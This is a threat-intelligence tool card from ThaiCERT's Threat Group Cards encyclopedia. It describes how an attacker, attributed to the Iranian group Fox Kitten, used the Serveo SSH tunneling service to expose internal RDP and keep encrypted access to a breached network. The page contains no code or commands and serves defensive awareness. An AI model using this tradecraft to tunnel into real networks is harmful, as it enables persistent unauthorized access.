Home > List all groups > List all tools > List all groups using tool Serveo

Threat Group Cards: A Threat Actor Encyclopedia

Permanent link Tool: Serveo

TypeBackdoor, Tunneling
Description(ClearSky) Serveo is a free tool for opening outside-facing servers and applications on a corporate network, whether on localhost or elsewhere. Unlike Ngrok, Serveo is an SSH-only server; also, any port that will be defined to it (safe for 22, 80, and 443 which are accessible from outside) will get another, unassigned TCP port instead. Using this service, the attacker was operating different services inside the network. Thus, for instance, the attacker had operated an RDP connection through the localhost on port 3389 (RDP); using Serveo, the attacker has opened this RDP for the outside world through port 12618 (TCP). The attacker has opened an SSH tunneling to another port in order to maintain an encrypted RDP on the attacked target.

Moreover, like with the backdoor that had hardcoded and predefined credentials, here too the attacker separated every server that was opened to the outside world.

Last change to this tool card: 19 April 2020

Download this tool card in JSON format

All groups using tool Serveo


APT groups

 Parisite, Fox Kitten, Pioneer KittenIran2017-Sep 2020 

1 group listed (1 APT, 0 other, 0 unknown)

Thailand Computer Emergency Response Team (ThaiCERT)
Electronic Transactions Development Agency

Follow us on

Facebook Twitter

Report incidents

Telephone +66 (0)2-123-1234
PGP Download PGP key